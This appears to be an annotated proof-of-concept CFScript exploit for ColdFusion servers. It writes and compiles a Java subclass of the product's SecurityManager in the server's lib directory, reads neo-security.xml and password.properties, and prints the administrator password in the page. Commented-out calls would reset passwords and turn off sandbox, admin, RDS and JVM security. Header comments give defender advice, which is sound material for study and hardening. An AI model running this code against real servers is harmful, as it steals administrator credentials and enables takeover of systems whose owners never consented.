/*
 * Proof-of-concept CFScript: a template that is allowed to instantiate
 * arbitrary Java objects reads the ColdFusion administrator password through
 * the server's own coldfusion.security.SecurityManager class.
 * NOTE(review): the enclosing <cfscript>/<cfoutput> tags and the original line
 * breaks appear to have been lost in extraction; statements are restored one
 * per line here.
 *
 * Sequence visible in the code:
 *   1. Write SecurityExploit.java into {Server.ColdFusion.Rootdir}/lib.
 *   2. Compile it in-process with sun.tools.javac.Main against cfusion.jar.
 *   3. Instantiate the class over neo-security.xml and password.properties,
 *      call load(), then getAdminPassword().
 *
 * Preconditions the script relies on:
 *   - CreateObject("java", ...) is permitted for the executing template.
 *   - The ColdFusion service account can write to the lib directory.
 *
 * Defender notes:
 *   - Restrict CreateObject for untrusted code (ColdFusion sandbox security can
 *     disable individual functions per directory) and keep the lib directory
 *     read-only for the service account.
 *   - The script never deletes SecurityExploit.java; the compiled class
 *     presumably lands beside it in lib (no -d option is passed). Unexpected
 *     .java/.class files under lib are worth alerting on.
 *   - If this has run on a server, treat the administrator and RDS passwords
 *     as exposed and rotate them.
 */

// Java helper objects obtained through ColdFusion's Java interop.
objFileWriter = CreateObject("java","java.io.FileWriter");
objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");
objJavaC = CreateObject("java","sun.tools.javac.Main");
objString = CreateObject("java","java.lang.String");
objFile = CreateObject("java","java.io.File");

// Choose the path separator from the reported OS name.
if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }

// Every path is under the server's own lib directory: the generated source,
// the product jar used as compile classpath, and the two credential stores.
strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";
strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";
strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";
strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";

// Open the source file for writing; the second argument (append) is false, so
// an existing file of that name is overwritten.
fileWriter = objFileWriter.init("#strJavaSource#",false);

// The generated class subclasses the product's SecurityManager, forwards the
// two File arguments to the superclass constructor, and overrides
// isAdminSecurityEnabled() to always return false.
// NOTE(review): presumably the override keeps inherited methods from being
// gated on admin security; confirm against the SecurityManager class.
fileWriter.write("import coldfusion.security.SecurityManager;");
fileWriter.write("import java.io.File;");
fileWriter.write("public class SecurityExploit extends SecurityManager {");
fileWriter.write("public SecurityExploit(File arg0, File arg1) {");
fileWriter.write("super(arg0, arg1); }");
fileWriter.write("public boolean isAdminSecurityEnabled(){");
fileWriter.write("return false;}}");
fileWriter.flush();
fileWriter.close();

// Build the compiler argument array by splitting a comma-joined string:
// -classpath <cfusion.jar> <source file>.
str = objString.init("-classpath,#strCfusionJar#,#strJavaSource#");
strArr = str.split(",");

// Compile inside the server JVM. Compiler messages go to byteArray, which is
// never read, and the result of compile() is not checked.
byteArray = objByteArray.init();
compileObj =objJavaC.init(byteArray,str);
compileObj.compile(strArr);

// Load the freshly compiled class and hand it the two credential files.
obj = CreateObject("java","SecurityExploit");
file1 = objFile.init("#strNeoSecFile#");
file2 = objFile.init("#strPasswdFile#");
obj.init(file1,file2);
// NOTE(review): load() presumably parses the two files into memory; its
// implementation is not shown here.
obj.load();

// Get Administrator Password
strAdminPw = obj.getAdminPassword();

// The remaining calls are disabled in this listing. Unlike the read above,
// each one would change server security configuration.
// Set Administrator Password
//obj.setAdminPassword("test123");
// Turn off Sandbox Security
//obj.setSandboxSecurityEnabled(false);
// Turn off Administrator Login
//obj.setAdminSecurityEnabled(false);
// Turn off RDS Login
//obj.setRdsSecurityEnabled(false);
// Set RDS Password
//obj.setRdsPassword("test123");
// Turn off JVM Security
//obj.setJvmSecurityEnabled(false);

// Template output, not script: the retrieved value is written into the HTTP
// response, so it may also end up in proxy or response logs.
Adminstrator Password: #strAdminPw#